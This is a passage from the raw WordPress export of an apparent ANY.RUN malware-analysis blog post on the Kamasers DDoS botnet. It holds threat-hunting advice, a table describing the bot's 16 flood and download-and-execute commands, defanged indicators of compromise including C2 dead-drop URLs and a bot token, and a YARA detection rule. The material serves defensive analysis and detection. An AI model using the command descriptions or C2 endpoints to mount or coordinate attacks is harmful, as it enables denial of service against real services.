commands&nbsp;like&nbsp;!download&nbsp;or&nbsp;!descargar&nbsp;<\/li>\n\n\n\n<li>status reporting back to the C2 infrastructure&nbsp;<\/li>\n<\/ul>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"724\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-25-at-09.19.09-1024x724.png\" alt=\"\" class=\"wp-image-19485\" 
style=\"width:600px;height:auto\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-25-at-09.19.09-1024x724.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-25-at-09.19.09-300x212.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-25-at-09.19.09-768x543.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-25-at-09.19.09-1536x1086.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-25-at-09.19.09-370x261.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-25-at-09.19.09-270x191.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-25-at-09.19.09-740x523.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-25-at-09.19.09.png 1548w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Relevant IOCs automatically gathered in one tab inside&nbsp;ANY.RUN&nbsp;sandbox<\/em>&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<p>This helps teams quickly&nbsp;determine&nbsp;whether the malware is only&nbsp;participating&nbsp;in DDoS activity or whether it also creates risk of further payload delivery and deeper compromise.&nbsp;<\/p>\n\n\n\n<!-- Regular Banner START -->\n<div class=\"regular-banner\">\n<!-- Text Content -->\n<p class=\"regular-banner__text\">\n<span class=\"highlight\">74% of Fortune 100 companies \n<\/span>rely on ANY.RUN <br>for earlier detection and <span class=\"highlight\">faster SOC<\/span> response \n&nbsp;   \n<\/p>\n<!-- CTA Link -->\n<a class=\"regular-banner__link\" id=\"article-banner-regular\" 
href=\"https:\/\/any.run\/enterprise\/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=kamasers-technical-analysis&#038;utm_term=250326&#038;utm_content=linktoenterprise#contact-sales\" rel=\"noopener\" target=\"_blank\">\nPower your SOC now\n<\/a>\n<\/div>\n<!-- Regular Banner END -->\n<!-- Regular Banner Styles START -->\n\n<style>\n.regular-banner {\ndisplay: flex;\ntext-align: center;\nflex-direction: column;\nalign-items: center;\ngap: 1.5rem;\nwidth: 100%;\npadding: 2rem;\nmargin: 1.5rem 0;\nborder-radius: 0.5rem;\nfont-family: 'Catamaran Bold';\nmargin-inline: auto;\nbackground: rgba(32, 168, 241, 0.1);\nborder: 1px solid rgba(75, 174, 227, 0.32);\n}\n\n.regular-banner__text {\nfont-size: 1.5rem;\nmargin: 0;\n}\n\n.highlight {\ncolor: #ea2526;\n}\n\n.regular-banner__link {\npadding: 0.5rem 1.5rem;\nfont-weight: 500;\ntext-decoration: none;\nborder-radius: 0.5rem;\ncolor: #FFFFFF;\nbackground-color: #1491D4;\ntext-align: center;\ntransition: all 0.2s ease-in;\n}\n\n.regular-banner__link:hover {\nbackground-color: #68CBFF;\ncolor: white;\n}\n<\/style>\n<!-- Regular Banner Styles END -->\n\n\n\n<h3 class=\"wp-block-heading\">3. 
Threat Hunting: Pivot from One Sample to Related Infrastructure&nbsp;<\/h3>\n\n\n\n<p>Once&nbsp;Kamasers&nbsp;is confirmed, the next step is&nbsp;understanding&nbsp;how far the activity may extend.&nbsp;<\/p>\n\n\n\n<p>Using&nbsp;ANY.RUN\u2019s&nbsp;<a href=\"https:\/\/any.run\/threat-intelligence-lookup\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=kamasers-technical-analysis&amp;utm_term=250326&amp;utm_content=linktotilookuplanding\" target=\"_blank\" rel=\"noreferrer noopener\">Threat Intelligence&nbsp;Lookup<\/a>, teams can pivot from the&nbsp;initial&nbsp;sample to uncover related infrastructure, connected sessions, and recurring patterns across the broader campaign.&nbsp;<\/p>\n\n\n\n<p>This makes it possible to:&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>identify&nbsp;other samples tied to the&nbsp;Kamasers&nbsp;family&nbsp;<\/li>\n\n\n\n<li>trace infrastructure linked to the botnet\u2019s C2 activity&nbsp;<\/li>\n\n\n\n<li>investigate repeated use of ASN-linked hosting such as&nbsp;Railnet<\/li>\n\n\n\n<li>expand detection based on shared behavior and network indicators&nbsp;<\/li>\n<\/ul>\n\n\n\n<p><a href=\"https:\/\/intelligence.any.run\/analysis\/lookup?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=kamasers-technical-analysis&amp;utm_term=250326&amp;utm_content=linktolookup#{%22query%22:%22threatName:%5C%22kamasers%5C%22%22,%22dateRange%22:30}\" target=\"_blank\" rel=\"noreferrer noopener\">threatName:&#8221;kamasers&#8221;<\/a>&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"446\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-24-at-19.16.58-1024x446.png\" alt=\"\" class=\"wp-image-19465\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-24-at-19.16.58-1024x446.png 1024w, 
https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-24-at-19.16.58-300x131.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-24-at-19.16.58-768x334.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-24-at-19.16.58-1536x669.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-24-at-19.16.58-2048x892.png 2048w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-24-at-19.16.58-370x161.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-24-at-19.16.58-270x118.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-24-at-19.16.58-740x322.png 740w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>ANY.RUN\u2019s&nbsp;sandbox&nbsp;sessions related to the&nbsp;Kamasers&nbsp;attacks displayed inside TI&nbsp;Lookup<\/em>&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<p>By pivoting from one confirmed sample, security teams can turn a single investigation into broader visibility across related botnet activity.&nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Conclusion&nbsp;<\/h2>\n\n\n\n<p>Kamasers is a sophisticated&nbsp;<strong>DDoS botnet<\/strong>&nbsp;with a well-designed architecture. Its use of a&nbsp;<strong>Dead Drop Resolver<\/strong>&nbsp;through legitimate services makes its C2 infrastructure highly resilient to&nbsp;takedown&nbsp;efforts. 
The presence of&nbsp;<strong>16 different attack methods<\/strong>, including modern vectors such as&nbsp;<strong>GraphQL<\/strong>&nbsp;and&nbsp;<strong>HTTP bypass<\/strong>, along with advanced implementations of classic techniques, makes&nbsp;<strong>Kamasers<\/strong>&nbsp;a highly versatile tool for carrying out DDoS attacks.&nbsp;<\/p>\n\n\n\n<p>For business leaders,&nbsp;Kamasers&nbsp;shows that resilient, multi-vector botnets can threaten not only infrastructure, but also uptime, customer experience, and revenue-critical operations.&nbsp;<\/p>\n\n\n\n<p><a href=\"https:\/\/any.run\/enterprise\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=kamasers-technical-analysis&amp;utm_term=250326&amp;utm_content=linktoenterprise#contact-sales\" target=\"_blank\" rel=\"noreferrer noopener\">Power faster, clearer investigations with&nbsp;ANY.RUN&nbsp;\u279c<\/a>&nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">About ANY.RUN&nbsp;<\/h2>\n\n\n\n<p><a href=\"https:\/\/any.run\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=kamasers-technical-analysis&amp;utm_term=250326&amp;utm_content=linktolanding\" target=\"_blank\" rel=\"noreferrer noopener\">ANY.RUN<\/a>, a leading provider of&nbsp;<a href=\"https:\/\/any.run\/features\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=kamasers-technical-analysis&amp;utm_term=250326&amp;utm_content=linktosandboxlanding\" target=\"_blank\" rel=\"noreferrer noopener\">interactive malware analysis<\/a>&nbsp;and threat intelligence solutions, fits naturally into modern SOC workflows and supports investigations from&nbsp;initial&nbsp;alert to final containment.&nbsp;&nbsp;<\/p>\n\n\n\n<p>It allows teams to safely execute suspicious files and URLs,&nbsp;observe&nbsp;real behavior in an interactive environment, enrich indicators with immediate context through&nbsp;<a 
href=\"https:\/\/any.run\/threat-intelligence-lookup\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=kamasers-technical-analysis&amp;utm_term=250326&amp;utm_content=linktotilookuplanding\" target=\"_blank\" rel=\"noreferrer noopener\">TI Lookup<\/a>, and continuously monitor emerging infrastructure using <a href=\"https:\/\/any.run\/threat-intelligence-feeds\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=kamasers-technical-analysis&amp;utm_term=250326&amp;utm_content=linktotifeedslanding\" target=\"_blank\" rel=\"noreferrer noopener\">Threat Intelligence Feeds<\/a>. Together, these capabilities help reduce uncertainty, accelerate triage, and limit unnecessary escalations across the SOC.<\/p>\n\n\n\n<p>ANY.RUN also meets enterprise security and compliance expectations. The company is <a href=\"https:\/\/any.run\/compliance\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=kamasers-technical-analysis&amp;utm_term=250326&amp;utm_content=linktocompliance\" target=\"_blank\" rel=\"noreferrer noopener\">SOC 2 Type II certified<\/a>, reinforcing its commitment to protecting customer data and maintaining strong security controls.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Complete List of Kamasers Commands<\/h2>\n\n\n\n<div class=\"wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper\">\n<table id=\"wpdtSimpleTable-287\" class=\"wpdtSimpleTable wpDataTable\" data-column=\"2\" data-rows=\"17\" data-wpID=\"287\" data-responsive=\"0\" data-has-header=\"1\">\n<thead>\n<tr><th>Command<\/th><th>Purpose<\/th><\/tr>\n<\/thead>\n<tbody>\n<tr><td><strong>!stop<\/strong><\/td><td>Stops the current operation. Closes sockets, terminates attack threads, and clears buffers.<\/td><\/tr>\n<tr><td><strong>!download<\/strong><\/td><td>Downloads and executes a file. Retrieves a PE file over HTTP, verifies it, and launches it. Also detects whether the file has been removed by antivirus software.<\/td><\/tr>\n<tr><td><strong>!visiturl<\/strong><\/td><td>Sends a basic HTTP GET request to the specified URL to generate traffic or check availability.<\/td><\/tr>\n<tr><td><strong>!httpget<\/strong><\/td><td>Basic HTTP GET flood implementation. Spawns several dozen threads with minimal randomization.<\/td><\/tr>\n<tr><td><strong>!httpgetpro<\/strong><\/td><td>Advanced HTTP GET flood. Spawns hundreds of threads, randomizes the User-Agent, Referer, URL paths, and parameters. Uses keep-alive connections.<\/td><\/tr>\n<tr><td><strong>!httppost<\/strong><\/td><td>HTTP POST flood. Sends POST requests with randomized headers and payloads, creating load on server-side data processing.<\/td><\/tr>\n<tr><td><strong>!tlsflood<\/strong><\/td><td>TLS handshake flood. Initiates SSL\/TLS handshakes without completing them, creating load on the server\u2019s cryptographic operations.<\/td><\/tr>\n<tr><td><strong>!httpbypass<\/strong><\/td><td>HTTP attack with defense evasion. Uses WAF\/CDN bypass techniques such as header manipulation, payload encoding, and request fragmentation.<\/td><\/tr>\n<tr><td><strong>!graphql<\/strong><\/td><td>GraphQL API flood. Sends deeply nested GraphQL queries that create exponential load on the server parser.<\/td><\/tr>\n<tr><td><strong>!httphulk<\/strong><\/td><td>HULK attack (HTTP Unbearable Load King). Applies maximum randomization to all HTTP request parameters to bypass caching and rate limiting.<\/td><\/tr>\n<tr><td><strong>!fastflood<\/strong><\/td><td>Optimized high-speed flood with minimal overhead, designed to saturate available bandwidth.<\/td><\/tr>\n<tr><td><strong>!proloris<\/strong><\/td><td>Professional implementation of Slowloris. Slowly sends partial HTTP headers to exhaust the server\u2019s connection pool.<\/td><\/tr>\n<tr><td><strong>!slowread<\/strong><\/td><td>Slow Read attack. Requests a large file and reads it very slowly to tie up server resources.<\/td><\/tr>\n<tr><td><strong>!udppro<\/strong><\/td><td>Professional UDP flood with support for IP spoofing and NTP\/DNS amplification.<\/td><\/tr>\n<tr><td><strong>!tcppro<\/strong><\/td><td>Advanced TCP flood. Combines SYN flood, ACK flood, and connection reset techniques to exhaust the TCP state table.<\/td><\/tr>\n<tr><td><strong>!tcphold<\/strong><\/td><td>TCP connection holding. Establishes the maximum number of connections while maintaining minimal keep-alive traffic to exhaust server limits.<\/td><\/tr>\n<\/tbody>\n<\/table>\n<\/div><style id='wpdt-custom-style-287'>\ntable#wpdtSimpleTable-287{ table-layout: fixed !important; }\ntable#wpdtSimpleTable-287 td, table.wpdtSimpleTable287 th { white-space: normal !important; }\n<\/style>\n\n\n\n\n<h2 class=\"wp-block-heading\">Indicators of Compromise (IOCs)<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li>F6c6e16a392be4dbf9a3cf1085b4ffc005b0931fc8eeb5fedf1c7561b2e5ad6b<\/li>\n<li>Dd305f7f1131898c736c97f43c6729bf57d3980fc269400d23412a282ee71a9a<\/li>\n<li>hxxp:\/\/45[.]151[.]91[.]187\/pa[.]php<\/li>\n<li>hxxp:\/\/91[.]92[.]240[.]50\/pit\/wp[.]php<\/li>\n<li>071a1960fbd7114ca87d9da138908722d7f1c02af90ea2db1963915fbe234c52<\/li>\n<li>hxxp:\/\/178[.]16[.]54[.]87\/uda\/ph[.]php<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">C2 Infrastructure (DDR)<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>gist[.]github[.]com\/pitybugak\/5d16b75e8bd071e15b04cc9c06dcfafa[.]js<\/li>\n<li>api[.]telegram[.]org\/bot8215158687:AAFgSmsaxfsJozcHIIYPv-HytZ3eCEaUrKg<\/li>\n<li>dl[.]dropboxusercontent[.]com\/s\/jqvpmc0kwg6ffi1mineh2\/fj[.]txt<\/li>\n<li>Bitbucket[.]org\/serky\/repyx\/raw\/main\/fq[.]txt<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">Fallback domains<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>pitybux[.]com<\/li>\n<li>ryxuz[.]com<\/li>\n<li>toksm[.]com<\/li>\n<li>Boskuh[.]com<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">YARA rules<\/h3>\n\n\n\n<pre class=\"wp-block-code\"><code>rule Kamasers {\n    meta:\n        description = \"Detects Kamasers DDoS botnet\"\n        author = \"ANY.RUN\"\n        date = \"2026-02-11\"\n        threat = \"Kamasers\"\n    strings:\n        $cmd1 = \"!stop\" ascii fullword\n        $cmd2 = \"!download\" ascii fullword\n        $cmd3 = \"!visiturl\" ascii fullword\n        $cmd4 = \"!httpget\" ascii fullword\n        $cmd5 = \"!httpgetpro\" ascii fullword\n        $cmd6 = \"!httppost\" ascii fullword\n        $cmd7 = \"!tlsflood\" ascii fullword\n        $cmd8 = \"!httpbypass\" ascii fullword\n        $cmd9 = \"!graphql\" ascii fullword\n        $cmd10 = \"!httphulk\" ascii fullword\n        $cmd11 = \"!fastflood\" ascii fullword\n        $cmd12 = \"!proloris\" ascii fullword\n        $cmd13 = \"!slowread\" ascii fullword\n        $cmd14 = \"!udppro\" ascii fullword\n        $cmd15 = \"!tcppro\" ascii fullword\n        $cmd16 = \"!tcphold\" ascii fullword\n        $msg1 = \"Task completed:\" ascii fullword\n        $msg2 = \"Task completed: GraphQL Flood on\" ascii fullword\n        $msg3 = \"Task completed: HULK on\" ascii fullword\n        $msg4 = \"Task completed: UDPPRO Flood on\" ascii fullword\n        $msg5 = \"Task completed: TCPPRO Flood on\" ascii fullword\n        $msg6 = \"Task completed: TCP HOLD on\" ascii fullword\n        $msg7 = \"Task completed: Download &amp; Execute from\" ascii fullword\n        $msg8 = \"Task completed: Visit URL\" ascii fullword\n        $msg9 = \"Starting GraphQL Flood on\" ascii fullword\n        $msg10 = \"Starting HULK on\" ascii fullword\n        $msg11 = \"Starting UDP PRO on\" ascii fullword\n        $msg12 = \"Starting TCP PRO on\" ascii fullword\n        $msg13 = \"Starting TCP HOLD on\" ascii fullword\n        $msg14 = \"Starting Visit URL task on\" ascii fullword\n        $msg15 = \"Runtime error in D&amp;E task:\" ascii fullword\n        $msg16 = \"Unknown exception in DownloadAndExecuteTask\" ascii fullword\n        $msg17 = \"Awaiting task\" ascii fullword\n        $msg18 = \"Downloading file from:\" ascii fullword\n        $msg19 = \"Downloaded file disappeared (AV\/EDR?)\" ascii fullword\n        $msg20 = \"Download failed with HRESULT:\" ascii fullword\n        $msg21 = \"HTTP GET Flood\" ascii fullword\n        $msg22 = \"HTTP GET PRO\" ascii fullword\n        $msg23 = \"HTTP POST Flood\" ascii fullword\n        $msg24 = \"HULK_POST\" ascii fullword\n    condition:\n        uint16(0) == 0x5A4D and\n        (10 of ($cmd*)) and\n        (8 of ($msg*))\n}<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>DDoS attacks are no longer only an infrastructure problem. They can quickly turn into a business issue, affecting uptime, customer experience, and operational stability. Kamasers is a strong example of this new reality, with broad attack capabilities and resilient command-and-control mechanisms that allow it to remain active under pressure. Let\u2019s explore the Kamasers botnet through [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":19488,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[8],"tags":[57,10,34],"class_list":["post-19450","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-malware-analysis","tag-anyrun","tag-cybersecurity","tag-malware-analysis"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v20.10 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Kamasers Analysis: A Multi-Vector DDoS Botnet Targeting Organizations Worldwide<\/title>\n<meta name=\"description\" content=\"See how the Kamasers botnet can disrupt business operations through multi-vector DDoS attacks, resilient infrastructure, and broad attack capabilities.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\"
href=\"https:\/\/any.run\/cybersecurity-blog\/kamasers-technical-analysis\/\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Achmad Adhikara, 4OURUP and GridGuardGhoul\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"19 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/kamasers-technical-analysis\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/kamasers-technical-analysis\/\"},\"author\":{\"name\":\"Achmad Adhikara, 4OURUP and GridGuardGhoul\",\"@id\":\"https:\/\/any.run\/\"},\"headline\":\"Kamasers\u00a0Analysis: A Multi-Vector DDoS Botnet Targeting Organizations Worldwide\u00a0\",\"datePublished\":\"2026-03-25T10:20:25+00:00\",\"dateModified\":\"2026-03-27T09:07:17+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/kamasers-technical-analysis\/\"},\"wordCount\":4208,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/any.run\/\"},\"keywords\":[\"ANYRUN\",\"cybersecurity\",\"malware analysis\"],\"articleSection\":[\"Malware Analysis\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/any.run\/cybersecurity-blog\/kamasers-technical-analysis\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/kamasers-technical-analysis\/\",\"url\":\"https:\/\/any.run\/cybersecurity-blog\/kamasers-technical-analysis\/\",\"name\":\"Kamasers Analysis: A Multi-Vector DDoS Botnet Targeting Organizations Worldwide\",\"isPartOf\":{\"@id\":\"https:\/\/any.run\/\"},\"datePublished\":\"2026-03-25T10:20:25+00:00\",\"dateModified\":\"2026-03-27T09:07:17+00:00\",\"description\":\"See how the Kamasers botnet can disrupt business operations through multi-vector 
DDoS attacks, resilient infrastructure, and broad attack capabilities.\",\"breadcrumb\":{\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/kamasers-technical-analysis\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/any.run\/cybersecurity-blog\/kamasers-technical-analysis\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/kamasers-technical-analysis\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/any.run\/cybersecurity-blog\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Malware Analysis\",\"item\":\"https:\/\/any.run\/cybersecurity-blog\/category\/malware-analysis\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Kamasers\u00a0Analysis: A Multi-Vector DDoS Botnet Targeting Organizations Worldwide\u00a0\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/any.run\/\",\"url\":\"https:\/\/any.run\/\",\"name\":\"ANY.RUN&#039;s Cybersecurity Blog\",\"description\":\"Cybersecurity Blog covers topics for experienced professionals as well as for those new to it.\",\"publisher\":{\"@id\":\"https:\/\/any.run\/\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/any.run\/?s={search_term_string}\"},\"query-input\":\"required 
name=search_term_string\"}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/any.run\/\",\"name\":\"ANY.RUN\",\"url\":\"https:\/\/any.run\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/any.run\/\",\"url\":\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2020\/08\/ANYRUN-Icon.svg\",\"contentUrl\":\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2020\/08\/ANYRUN-Icon.svg\",\"width\":1,\"height\":1,\"caption\":\"ANY.RUN\"},\"image\":{\"@id\":\"https:\/\/any.run\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/www.any.run\/\",\"https:\/\/twitter.com\/anyrun_app\",\"https:\/\/www.linkedin.com\/company\/30692044\",\"https:\/\/www.youtube.com\/channel\/UCOgCPho7lzmH7m6fPNlukrQ\"]},[{\"@type\":[\"Person\"],\"@id\":\"https:\/\/any.run\/\",\"name\":\"Achmad Adhikara\",\"image\":{\"@type\":\"ImageObject\",\"@id\":\"https:\/\/any.run\/\",\"inLanguage\":\"en_US\",\"url\":\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/Adhikara-1-150x150.jpg\",\"caption\":\"Achmad Adhikara\"}},{\"@type\":[\"Person\"],\"@id\":\"https:\/\/any.run\/\",\"name\":\"4OURUP\",\"image\":{\"@type\":\"ImageObject\",\"@id\":\"https:\/\/any.run\/\",\"inLanguage\":\"en_US\",\"url\":\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/01\/4up-150x150.jpg\",\"caption\":\"4OURUP\"}},{\"@type\":[\"Person\"],\"@id\":\"https:\/\/any.run\/\",\"name\":\"GridGuardGhoul\",\"image\":{\"@type\":\"ImageObject\",\"@id\":\"https:\/\/any.run\/\",\"inLanguage\":\"en_US\",\"url\":\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/01\/image_GridGuardGhoul-150x150.jpeg\",\"caption\":\"GridGuardGhoul\"}}]]}<\/script>\n<!-- \/ Yoast SEO plugin. 
-->"}
\/wp-json\/wp\/v2\/comments?post=19450"}],"version-history":[{"count":37,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/posts\/19450\/revisions"}],"predecessor-version":[{"id":19533,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/posts\/19450\/revisions\/19533"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/media\/19488"}],"wp:attachment":[{"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/media?parent=19450"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/categories?post=19450"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/tags?post=19450"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}